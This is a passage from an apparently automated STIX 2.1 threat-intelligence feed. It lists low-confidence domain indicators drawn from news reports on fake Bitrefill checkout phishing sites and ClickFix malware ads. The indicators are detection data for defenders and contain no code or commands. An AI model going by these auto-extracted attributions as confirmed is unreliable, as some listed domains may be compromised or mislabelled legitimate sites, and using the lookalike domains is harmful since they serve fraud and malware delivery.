Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--08247ebd-f13b-4133-9526-97c79a5cc37f","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: xn--bitrefll-h2a.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: y-butrefill[.]com pay-bitigift[.]com xn--bitrefll-71a[.]com xn--bitrefll-h2a[.]com xn--bitrefll-pay-kfb[.]com xn--bitrefll-pay-xfb[.]com xn-","pattern":"[domain-name:value = 'xn--bitrefll-h2a.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d647cb7a-d967-4284-a834-47b4be41e503","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: xn--bitrefll-pay-kfb.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: itigift[.]com xn--bitrefll-71a[.]com xn--bitrefll-h2a[.]com xn--bitrefll-pay-kfb[.]com xn--bitrefll-pay-xfb[.]com xn--bitrefll-q2a[.]com xn--bit","pattern":"[domain-name:value = 'xn--bitrefll-pay-kfb.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--448b6e42-7e3a-41ea-a367-3787a0612c0c","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: xn--bitrefll-pay-xfb.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: 71a[.]com xn--bitrefll-h2a[.]com xn--bitrefll-pay-kfb[.]com xn--bitrefll-pay-xfb[.]com xn--bitrefll-q2a[.]com xn--bitreill-cz9c[.]com xn--bitrei","pattern":"[domain-name:value = 'xn--bitrefll-pay-xfb.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b546a2da-8179-42d9-bca6-4193ec74af23","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: xn--bitrefll-q2a.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: .]com xn--bitrefll-pay-kfb[.]com xn--bitrefll-pay-xfb[.]com xn--bitrefll-q2a[.]com xn--bitreill-cz9c[.]com xn--bitreill-pay-yq4f[.]com xn--b","pattern":"[domain-name:value = 'xn--bitrefll-q2a.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--15d68423-6143-4b9a-b809-c8fb8ce10e2a","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: xn--bitreill-cz9c.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: kfb[.]com xn--bitrefll-pay-xfb[.]com xn--bitrefll-q2a[.]com xn--bitreill-cz9c[.]com xn--bitreill-pay-yq4f[.]com xn--btrefill-l2a[.]com xn--pa","pattern":"[domain-name:value = 'xn--bitreill-cz9c.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--747463e8-e25a-4768-968f-d73f94594ce0","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: xn--bitreill-pay-yq4f.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: ay-xfb[.]com xn--bitrefll-q2a[.]com xn--bitreill-cz9c[.]com xn--bitreill-pay-yq4f[.]com xn--btrefill-l2a[.]com xn--pay-bitrefll-fgb[.]com Stop th","pattern":"[domain-name:value = 'xn--bitreill-pay-yq4f.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f1f4b9ca-3119-4a67-9506-9cdfaf6d4e33","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: xn--btrefill-l2a.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: a[.]com xn--bitreill-cz9c[.]com xn--bitreill-pay-yq4f[.]com xn--btrefill-l2a[.]com xn--pay-bitrefll-fgb[.]com Stop threats before they can d","pattern":"[domain-name:value = 'xn--btrefill-l2a.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8d5918c0-7656-46dc-b76f-b6bdbd68f833","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: xn--pay-bitrefll-fgb.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: 9c[.]com xn--bitreill-pay-yq4f[.]com xn--btrefill-l2a[.]com xn--pay-bitrefll-fgb[.]com Stop threats before they can do any harm. Malwarebytes Br","pattern":"[domain-name:value = 'xn--pay-bitrefll-fgb.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ce9174ed-e910-4f4e-9356-ffa297cdab34","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: aforvm.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ; verse-18[.]com; lakhov[.]com; mpasvw[.]com; ouilov[.]com; aforvm[.]com AMOS helper and tasking domains Domain loop-lumen[.]com;","pattern":"[domain-name:value = 'aforvm.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e1cb733b-2779-449f-abe9-55944b4a9c18","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: aidevmaster.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ]com; pressureulcerlawyer[.]com; lalandscapelighting[.]com; aidevmaster[.]com; pinescope11[.]com; dogtrainersgeorgia[.]com; denverplumb","pattern":"[domain-name:value = 'aidevmaster.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c4adcbc1-59cd-4593-a218-402983a894c3","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: alfredaps.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ltration Domain filequanticore[.]com; filesiriuscore[.]com; alfredaps[.]com; hbomaxx[.]us; hbomax-macos[.]com; bright-links[.]com; co","pattern":"[domain-name:value = 'alfredaps.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--181d1502-2805-4f15-ada4-cfec72c0b560","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: applediag.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: m; opendisplay[.]us Provisioning-linked lure domains Domain applediag[.]com; getnova[.]top; nova-desk[.]top; nova-fix[.]top; nova-hub","pattern":"[domain-name:value = 'applediag.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6f850140-b34f-461d-a78f-4cc7e6391a2f","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: arkypc.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: hbubagent[.]com MacSync delivery and control domains Domain arkypc[.]com; harbor-29[.]com; fern-plume[.]com; node-slate[.]com; gro","pattern":"[domain-name:value = 'arkypc.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--01ab0b17-e7d6-485c-a2e8-2f794213b7e8","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: basequill9.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: Click-tracking domains Domain press29[.]com; leaf68[.]com; basequill9[.]com; perchframe15[.]com; canvas-35[.]com; pine63[.]com; trekm","pattern":"[domain-name:value = 'basequill9.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8d65a038-677c-4752-b82f-030643755abf","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: beaocnagent.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: aesthetics[.]com; marbellaresales[.]com; gatemaden[.]space; beaocnagent[.]com; hbubagent[.]com MacSync delivery and control domains Dom","pattern":"[domain-name:value = 'beaocnagent.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3e46ae71-44b4-4789-a5fa-4248b0937c39","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: bright-links.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: e[.]com; alfredaps[.]com; hbomaxx[.]us; hbomax-macos[.]com; bright-links[.]com; codex-notes[.]com; storageprofiler[.]com; cladesktop[.]g","pattern":"[domain-name:value = 'bright-links.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2389aed4-afe3-401e-89ca-07b6b5f0f805","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: broadwalkindia.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: com; sprieagent[.]com; cosimcagent[.]com; cehamilton[.]com; broadwalkindia[.]com; cim-kolea[.]com; hindustanagency[.]com Teardown and deli","pattern":"[domain-name:value = 'broadwalkindia.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--95225f6e-05ad-4fd3-a7c7-e179cc531b84","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: camaligsalvatrefoils.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: -command lure domains Domain flutelikelurkerunsinewy[.]com; camaligsalvatrefoils[.]com Click-tracking domains Domain press29[.]com; leaf68[.]com","pattern":"[domain-name:value = 'camaligsalvatrefoils.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f9a8a4d3-a298-426e-9831-e28568389dc2","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: canvas-35.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: [.]com; leaf68[.]com; basequill9[.]com; perchframe15[.]com; canvas-35[.]com; pine63[.]com; trekmesh15[.]com macOS loader-delivery dom","pattern":"[domain-name:value = 'canvas-35.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8df4344e-ab60-4775-958c-fc12d9c3d18e","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: cehamilton.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ]com; sgaaagent[.]com; sprieagent[.]com; cosimcagent[.]com; cehamilton[.]com; broadwalkindia[.]com; cim-kolea[.]com; hindustanagency[.","pattern":"[domain-name:value = 'cehamilton.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ed22b534-0951-4abd-b986-9299b93a0691","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: chatgpt-safepage.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: cstoragetips[.]com Provisioning-neighborhood domains Domain chatgpt-safepage[.]com; thepullmanfolkestone[.]com; gigappyworld[.]com; microsof","pattern":"[domain-name:value = 'chatgpt-safepage.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8b86da47-30c7-49aa-aaac-31e4a4d5ebca","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: cladesktop.gitlab.io","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ight-links[.]com; codex-notes[.]com; storageprofiler[.]com; cladesktop[.]gitlab[.]io; cli-desktop[.]com; cli-stack[.]com; homebrwmac-hub[.]c","pattern":"[domain-name:value = 'cladesktop.gitlab.io']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--945943ff-112c-4589-8fe0-3c581a4b7233","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: claude-tools.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ]com; hbomaxx[.]app; codex-craft[.]com; code-desktop[.]com; claude-tools[.]com; clean-disk-tools[.]com; opendisplay[.]us Provisioning-li","pattern":"[domain-name:value = 'claude-tools.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2113db32-2e66-4ada-b73c-b8336e593c39","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: claud-tips.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: cli-guides[.]com; macdeveloperhub[.]com; macfixguide[.]com; claud-tips[.]com; codex-paths[.]com; cmux-lab[.]com; rectangleap[.]com; mu","pattern":"[domain-name:value = 'claud-tips.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--02990b95-45db-46bc-992f-e6c0beefecee","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: clean-disk-guide.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: r-focused ads linked to codex-craft[.]com, 15 tied to apple.clean-disk-guide[.]com, 11 for code-desktop[.]com and six for hbomax-macos[.]com","pattern":"[domain-name:value = 'clean-disk-guide.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b4a7158d-ad64-4577-8cbe-714517d0b143","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: clean-disk-tools.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: codex-craft[.]com; code-desktop[.]com; claude-tools[.]com; clean-disk-tools[.]com; opendisplay[.]us Provisioning-linked lure domains Domain","pattern":"[domain-name:value = 'clean-disk-tools.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--002b07a5-25c9-4b81-8f1b-99e6ebdca518","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: cli-desktop.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: tes[.]com; storageprofiler[.]com; cladesktop[.]gitlab[.]io; cli-desktop[.]com; cli-stack[.]com; homebrwmac-hub[.]com; clean-disk-guide[","pattern":"[domain-name:value = 'cli-desktop.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c34eafe1-c0eb-439a-a491-d44975bfbf4e","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: cli-guides.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: [.]bike SIC Windows-route domains Domain crisp-paths[.]com; cli-guides[.]com; macdeveloperhub[.]com; macfixguide[.]com; claud-tips[.]c","pattern":"[domain-name:value = 'cli-guides.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b1db7068-4feb-4d0a-9189-3f1ccbe18fab","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: cli-stack.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: rofiler[.]com; cladesktop[.]gitlab[.]io; cli-desktop[.]com; cli-stack[.]com; homebrwmac-hub[.]com; clean-disk-guide[.]com Copied-comm","pattern":"[domain-name:value = 'cli-stack.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--596f59f5-e140-4087-85bd-805def1b3cd3","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: clveeragent.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: heroestales[.]com; wantsellonline[.]com; papartybus[.]com; clveeragent[.]com; congiagent[.]com; sgaaagent[.]com; sprieagent[.]com; cos","pattern":"[domain-name:value = 'clveeragent.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a94cfeb4-61fa-44bf-bada-b1b0418c11ef","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: cmux-lab.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: om; macfixguide[.]com; claud-tips[.]com; codex-paths[.]com; cmux-lab[.]com; rectangleap[.]com; muse-code-ide[.]com; hbomaxx[.]app; c","pattern":"[domain-name:value = 'cmux-lab.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--85902584-7320-4ee3-8725-9725409a9d84","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: code-desktop.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: raft[.]com, 15 tied to apple.clean-disk-guide[.]com, 11 for code-desktop[.]com and six for hbomax-macos[.]com. The compromised account g","pattern":"[domain-name:value = 'code-desktop.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--eb13e881-05ed-4e27-a861-65287e2d2192","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: codex-craft.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: nts using hbomaxx[.]app, 36 developer-focused ads linked to codex-craft[.]com, 15 tied to apple.clean-disk-guide[.]com, 11 for code-des","pattern":"[domain-name:value = 'codex-craft.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7c66df54-5af5-468c-8686-ae550f2dff3e","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: codex-notes.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ]com; hbomaxx[.]us; hbomax-macos[.]com; bright-links[.]com; codex-notes[.]com; storageprofiler[.]com; cladesktop[.]gitlab[.]io; cli-des","pattern":"[domain-name:value = 'codex-notes.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--80b5096a-98b3-494a-892c-df5fae040bbd","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: codex-paths.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: macdeveloperhub[.]com; macfixguide[.]com; claud-tips[.]com; codex-paths[.]com; cmux-lab[.]com; rectangleap[.]com; muse-code-ide[.]com;","pattern":"[domain-name:value = 'codex-paths.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security 